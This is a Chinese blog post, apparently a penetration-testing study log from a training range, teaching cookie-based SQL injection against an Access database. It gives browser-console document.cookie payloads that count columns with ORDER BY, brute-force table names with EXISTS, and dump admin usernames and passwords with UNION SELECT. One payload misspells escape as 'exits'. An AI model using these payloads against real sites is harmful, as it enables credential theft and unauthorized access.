前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透测试系统学习-Day11&数据库注入靶场Day1Cookie注入

渗透测试系统学习-Day11&数据库注入靶场Day1Cookie注入

作者头像
Baige
发布2022-03-22 08:54:11
3590
发布2022-03-22 08:54:11
举报
文章被收录于专栏:世荣的博客

前言:

这里又是新的一章,关于数据库注入,前面讲的是SQL注入,这里是数据库注入,这方面我也没有系统的学习过,借助这次靶场的机会,好好规整规整知识路线。

1.Access-Cookie注入

这是浅蓝色的短代码框,用于显示一些信息。

介绍Cookie,什么是Cookie?这里我总结了关于什么是Cookie和Session还有Token。

Cookie Session和Token认证

前言:HTTP是一种无状态协议,为了分辨链接是谁发起的,需要浏览器自己去解决这个问题,不然有些情况下即使是打开同一...

Cookie就是代表访问者(用户)的身份证一样,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie那么你就可以无需密码直接登录管理员账号。

为什么Cookie和注入有联系?

在动态脚本语言中存在超时全局变量可以获取多种传参方式。

很多时候开发在开发过程中为了考虑到多种接受的参数,在接受参数的时候都是多种

例如: PHP中的$_REQUEST[]可以获取POST/GET/COOKIE传参

注意: PHP5.4版本以上就不会接受Cookie参数了。

如何进行Cookie传参呢?

1.Burp抓包改包然后添加或者修改Cookie的值就可以实现Cookie传参

2.通过浏览器F12的控制台进行修改Cookie的值

document.cookie="id="escape("171")

Cookie名字为id escape是一个编码函数,这个函数会进行一次URL编码。

3.以谷歌浏览器为例子直接去Application修改Cookie的值

4.还有一些插件也可以辅助修改

这里介绍一个函数:exists

EXISTS用于子查询,子查询是否至少会返回一行数据,该子查询实际上并不返回任何的数据,而是返回True或者False。

靶场练习

简介:Access数据库,只有一个库,所以表名字段名都要爆破。如果网站是.asp,是access数据库的可能性比较大。

这样的话,就没有办法进行GET、POST传参去进行注入了。

1.测试字段数

去控制台输入:

代码语言:javascript
复制
document.cookie="id="+exits("127 order by 1")

测试到11的时候发现报错,说明字段数为10。

2.爆破表名

然后由于Access只有一个库,所以直接判断表名;

代码语言:javascript
复制
document.cookie="id="+exists("127 and exists(select * from xxx)")

最后确定在admin表里有数据(题目提示的,可能是为了大家一起跑包,靶场也撑不住吧哈哈哈哈)

3.爆破字段值

代码语言:javascript
复制
document.cookie="id="+
escape("171 and exists(select 1,2,3,4,5,6,7,8,9,0 from admin)")
代码语言:javascript
复制
document.cookie="id="+escape("127 union select 1,username,
password,4,5,6,7,8,9,0 from admin ")

将密码进行MD5进行解密:

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022 年 03 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.Access-Cookie注入
  • 靶场练习
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档